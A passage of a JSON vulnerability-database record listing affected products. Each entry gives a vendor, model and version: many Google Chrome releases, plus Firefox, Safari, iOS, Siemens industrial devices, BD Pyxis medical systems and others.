        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.776.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1305.3"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.8"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.72"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "59.0.3071.91"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1075.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.24"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "14.01"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "43.0.2357.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.172"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.117"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.535.2"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.4.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.443.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.296.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.107"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.776.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.96379"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.217"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.900.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1074.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.126"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.19"
      },
      {
        "model": "x-series xos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "10.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.611.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.407.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.57"
      },
      {
        "model": "pyxis medstation es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.892.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.51"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.518.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.346.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1658.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.897.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.421.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.132"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.56"
      },
      {
        "model": "pyxis stockstation system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.0"
      },
      {
        "model": "simotion p320-4s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "36.0.1985.143"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1003.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.927.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.382.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.3"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.8"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.23"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "49.0.2623.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.55"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.462.0"
      },
      {
        "model": "simatic ipc827d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1021.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.9"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.77"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.16"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.818.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.08"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.645.0"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.126"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.23"
      },
      {
        "model": "chrome ~~~and",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "38.0.2125.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1065.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.674.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.905.0"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "facssample prep assistant iii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.169"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.531.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.23"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1284.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.115"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "20.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.59"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1040.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.35"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.939.0"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017030"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.758.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.93"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.5.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.99"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.184"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.154"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.112"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.2"
      },
      {
        "model": "windows for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.42"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.8"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.15"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.0.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.109"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.344"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "6.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.419.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.672.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.608.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.135"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.675.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.222.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.124"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.117"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.755.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1072.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.437.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.435.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.215"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "7.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.63"
      },
      {
        "model": "pyxis medication administration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.617.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1019.0"
      },
      {
        "model": "enterprise linux for real time",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.685.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.312"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.30"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.110"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.699.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.65"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.453.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.961.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.3"
      },
      {
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.5.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.202"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0.4"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "30"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.341"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.116"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.57"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1058"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "56.0.2924.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1662.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
